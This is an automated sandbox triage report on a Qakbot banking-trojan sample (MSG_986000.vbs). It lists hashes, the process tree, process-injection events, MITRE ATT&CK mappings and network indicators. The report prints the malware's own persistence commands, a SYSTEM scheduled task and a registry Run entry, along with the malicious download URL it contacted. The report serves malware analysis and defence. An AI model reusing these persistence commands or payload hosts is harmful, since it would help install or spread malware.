qakbot | d41c66a9160ce7f0dd0d1360d8b8339a8276fc30215f4623ca88d0efad319346 | Triage

Resubmissions

03/03/2020, 15:44 UTC

200303-bdsch48nyx 10

03/03/2020, 15:10 UTC

200303-v6kyhmnnrs 8

Analysis

max time kernel
135s
max time network
115s
platform
windows7_x64
resource
win7v200217
submitted
03/03/2020, 15:44 UTC

Sharing

General

Target

MSG_986000.vbs
Size

5.2MB
MD5

bb7fbcd342edcef5b43904fe867edc2c
SHA1

a6852667b3de27e6d6eb5820fd2d5267479bdffa
SHA256

d41c66a9160ce7f0dd0d1360d8b8339a8276fc30215f4623ca88d0efad319346
SHA512

2fa2ba7ebf5b624bcd30de80dd49763c1e787cf883ad6ab4a9e5ea286b0a40d4d317b4ba43f5a3e06d869b53f069ce030a793d6a3d7fc0b1e3998a6548253989

Score

10^/10

trojan banker stealer qakbot persistence

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1576	TableOfColors.exe
1440	TableOfColors.exe
1440	TableOfColors.exe
1604	ciynbw.exe
752	ciynbw.exe
752	ciynbw.exe
1644	explorer.exe
1644	explorer.exe

Loads dropped DLL 3 IoCs

pid	Process
1576	TableOfColors.exe
1576	TableOfColors.exe
1576	TableOfColors.exe

Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
trojan banker stealer qakbot

Blacklisted process makes network request 1 IoCs

flow	pid	Process
2	1860	WScript.exe

Executes dropped EXE 4 IoCs

pid	Process
1576	TableOfColors.exe
1440	TableOfColors.exe
1604	ciynbw.exe
752	ciynbw.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 1576 wrote to memory of 1440	1576	TableOfColors.exe	29
PID 1576 wrote to memory of 1440	1576	TableOfColors.exe	29
PID 1576 wrote to memory of 1440	1576	TableOfColors.exe	29
PID 1576 wrote to memory of 1440	1576	TableOfColors.exe	29
PID 1576 wrote to memory of 1604	1576	TableOfColors.exe	30
PID 1576 wrote to memory of 1604	1576	TableOfColors.exe	30
PID 1576 wrote to memory of 1604	1576	TableOfColors.exe	30
PID 1576 wrote to memory of 1604	1576	TableOfColors.exe	30
PID 1576 wrote to memory of 376	1576	TableOfColors.exe	31
PID 1576 wrote to memory of 376	1576	TableOfColors.exe	31
PID 1576 wrote to memory of 376	1576	TableOfColors.exe	31
PID 1576 wrote to memory of 376	1576	TableOfColors.exe	31
PID 1604 wrote to memory of 752	1604	ciynbw.exe	33
PID 1604 wrote to memory of 752	1604	ciynbw.exe	33
PID 1604 wrote to memory of 752	1604	ciynbw.exe	33
PID 1604 wrote to memory of 752	1604	ciynbw.exe	33
PID 1604 wrote to memory of 1644	1604	ciynbw.exe	34
PID 1604 wrote to memory of 1644	1604	ciynbw.exe	34
PID 1604 wrote to memory of 1644	1604	ciynbw.exe	34
PID 1604 wrote to memory of 1644	1604	ciynbw.exe	34
PID 1604 wrote to memory of 1644	1604	ciynbw.exe	34

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1604	ciynbw.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

Scheduled Task

pid	Process
376	schtasks.exe

Adds Run entry to start application 2 TTPs 1 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\Software\Microsoft\Windows\CurrentVersion\Run\rrsrvzik = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Cyuujswhia\\ciynbw.exe\""	explorer.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MSG_986000.vbs"
1⤵
- Blacklisted process makes network request
PID:1860

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1980

C:\Users\Admin\AppData\Local\Temp\TableOfColors.exe
"C:\Users\Admin\AppData\Local\Temp\TableOfColors.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Loads dropped DLL
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1576
- C:\Users\Admin\AppData\Local\Temp\TableOfColors.exe
  C:\Users\Admin\AppData\Local\Temp\TableOfColors.exe /C
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Executes dropped EXE
  PID:1440
- C:\Users\Admin\AppData\Roaming\Microsoft\Cyuujswhia\ciynbw.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Cyuujswhia\ciynbw.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  - Suspicious behavior: MapViewOfSection
  PID:1604
- - C:\Users\Admin\AppData\Roaming\Microsoft\Cyuujswhia\ciynbw.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Cyuujswhia\ciynbw.exe /C
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Executes dropped EXE
    PID:752
- - C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\explorer.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Adds Run entry to start application
    PID:1644
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn jtgbwgrid /tr "\"C:\Users\Admin\AppData\Local\Temp\TableOfColors.exe\" /I jtgbwgrid" /SC ONCE /Z /ST 16:47 /ET 16:59
  2⤵
  - Creates scheduled task(s)
  PID:376

Network

66.7.197.4:80

http://bw.cacsanet.com/auywndcga.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA

WScript.exe

17.3kB
885.5kB
316
188

HTTP Request

GET http://bw.cacsanet.com/auywndcga.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA

HTTP Response

200 OK

8.8.8.8:53

bw.cacsanet.com

75 B
91 B
1
1

DNS Request

bw.cacsanet.com

DNS Response

66.7.197.4
10.7.0.255:137

716 B
7
239.255.255.250:1900

1.1kB
6
239.255.255.250:1900

224.0.0.22

108 B
2

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Modify Registry

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/752-11-0x0000000002370000-0x0000000002381000-memory.dmp

Filesize
68KB

Download
memory/1440-5-0x0000000002220000-0x0000000002231000-memory.dmp

Filesize
68KB

Download
memory/1604-12-0x0000000002220000-0x000000000225C000-memory.dmp

Filesize
240KB

Download
memory/1860-0-0x0000000003870000-0x0000000003874000-memory.dmp

Filesize
16KB

Download